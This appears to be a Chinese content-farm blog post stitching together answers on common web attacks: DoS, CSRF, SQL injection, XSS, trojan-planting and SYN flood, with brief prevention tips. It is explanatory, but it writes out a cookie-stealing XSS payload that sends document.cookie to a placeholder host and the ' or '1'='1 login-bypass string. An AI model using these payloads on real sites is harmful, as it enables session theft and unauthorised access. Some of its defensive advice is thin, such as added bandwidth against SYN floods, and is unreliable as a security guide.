×

web常见攻击

web常见攻击(常见的几种web攻击方式及原理)

admin admin 发表于2024-05-01 02:38:22 浏览16 评论0

抢沙发发表评论

大家好,今天小编来为大家解答以下的问题,关于web常见攻击,常见的几种web攻击方式及原理这个很多人还不知道,现在让我们一起来看看吧!

本文目录

常见的几种web攻击方式及原理

一、Dos攻击(Denial of Service attack)  是一种针对服务器的能够让服务器呈现静止状态的攻击方式。有时候也加服务停止攻击或拒绝服务攻击。其原理就是发送大量的合法请求到服务器,服务器无法分辨这些请求是正常请求还是攻击请求,所以都会照单全收。海量的请求会造成服务器停止工作或拒绝服务的状态。这就是Dos攻击。二、跨站点请求伪造(CSRF,Cross-Site Request Forgeries)  是指攻击者通过已经设置好的陷阱,强制对已完成认证的用户进行非预期的个人信息或设定信息等某些状态的更新。属于被动攻击。更简单的理解就是攻击者盗用了你的名义,以你的名义发送了请求。  一个CSRF最简单的例子就是用户A登录了网站A在虚拟账户里转账了1000块钱,用户A在本地生成了网站A的cookie,用户A在没有关闭网站A的情况下有访问了恶意网站B,恶意网站B包含请求A网站的代码,利用了本地的cookie经过身份验证的身份又向网站A发送了一次请求,这时你就会发现你在网站A的账户又少了1000块。这就是基本的CSRF攻击方式。三、SOL注入攻击  是指通过对web连接的数据库发送恶意的SQL语句而产生的攻击,从而产生安全隐患和对网站的威胁,可以造成逃过验证或者私密信息泄露等危害。  SQL注入的原理是通过在对SQL语句调用方式上的疏漏,恶意注入SQL语句。

常见web攻击方法不包括

常见web攻击方法不包括业务测试,业务测试不属于攻击范围,微博攻击方式有:利用服务器配置漏洞攻击、恶意代码上传下载、构造恶意输入SQL注入攻击、命令注入攻击、跨站脚本攻击等。

Web安全的攻击种类

1、SQL注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。2、跨站脚本攻击(也称为XSS):指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。3、网页挂马:把一个木马程序上传到一个网站里面然后用木马生成器生一个网马,再上到空间里面,再加代码使得木马在打开网页里运行。

web常见的攻击方式有哪些,如何避免

原理:1.登录受信任网站A,并在本地生成Cookie。             2.在不登出A的情况下,访问危险网站B,引诱点击链接,实际上是调用A网站的链接,或者是接口地址,利用A的cookie未失效。 触发条件:A网站存在漏洞,用户在A网站登录过且cookie未失效 预防:token认证,访问网站,登录成功后,服务器生成token,存放在cookie里,session,或者本地,在访问接口的时候要求把token带上,到服务器端在验证(token最好是随机的,不可预测的)          referer认证,页面来源(在hearder里),服务器判断是否是本站点下的页面,如果不是直接拦截。 XSS:跨站脚本攻击,不需要登录,向网站注入脚本(盗用cookie,改变页面的dom结构,重定向链接)。 博客网站,攻击者在上面发了一篇文章,内容是《script》window.open(“www.xxx.com?param=”+document.cookie)《/script》浏览器运行非法的html 标签/Javascript,用户下次访问就会把cookie发送到攻击者的服务器上。 预防:将输入的数据进行转义处理,比如说讲 《 转义成《 SQL注入:sql语句伪造参数, 最常见的就是:’ or ’1’= ’1。这是最常见的sql注入攻击,当我们输如用户名 jiajun ,然后密码输如’or ’1’= ’1的时候,我们在查询用户名和密码是否正确的时候,本来要执行的是select * from user where username=’’ and password=’’,经过参数拼接后,会执行sql语句 select * from user where username=’jaijun’ and password=’ ’ or ’ 1’=’1 ’,这个时候1=1是成立,自然就跳过验证了。 预防:接口可以对采纳数进行转义,密码什么的敏感信息要加密 SYN Flood ,简单说一下tcp三次握手,客户端先服务器发出请求,请求建立连接,然后服务器返回一个报文,表明请求以被接受,然后客户端也会返回一个报文,最后建立连接。那么如果有这么一种情况,攻击者伪造ip地址,发出报文给服务器请求连接,这个时候服务器接受到了,根据tcp三次握手的规则,服务器也要回应一个报文,可是这个ip是伪造的,报文回应给谁呢,第二次握手出现错误,第三次自然也就不能顺利进行了,这个时候服务器收不到第三次握手时客户端发出的报文,又再重复第二次握手的操作。如果攻击者伪造了大量的ip地址并发出请求,这个时候服务器将维护一个非常大的半连接等待列表,占用了大量的资源,最后服务器瘫痪。 预防:增加服务器带宽。          

常见的web攻击有哪些

常见的Web攻击分为两类:一是利用Web服务器的漏洞进行攻击,如CGI缓冲区溢出,目录遍历漏洞利用等攻击;二是利用网页自身的安全漏洞进行攻击,如SQL注入,跨站脚本攻击等。常见的针对Web应用的攻击有:缓冲区溢出攻击者利用超出缓冲区大小的请求和构造的二进制代码让服务器执行溢出堆栈中的恶意指令Cookie假冒精心修改cookie数据进行用户假冒认证逃避攻击者利用不安全的证书和身份管理非法输入在动态网页的输入中使用各种非法数据,获取服务器敏感数据强制访问访问未授权的网页隐藏变量篡改对网页中的隐藏变量进行修改,欺骗服务器程序拒绝服务攻击构造大量的非法请求,使Web服务器不能相应正常用户的访问跨站脚本攻击提交非法脚本,其他用户浏览时盗取用户帐号等信息SQL注入构造SQL代码让服务器执行,获取敏感数据

常见web攻击方法不包含

常见web攻击方法不包含业务测试。因为常见的Web攻击方法主要有XSS攻击、CSRF攻击、SQL注入攻击、DDos攻击、文件漏洞攻击等。所以常见web攻击方法不包含业务测试。

关于web常见攻击到此分享完毕,希望能帮助到您。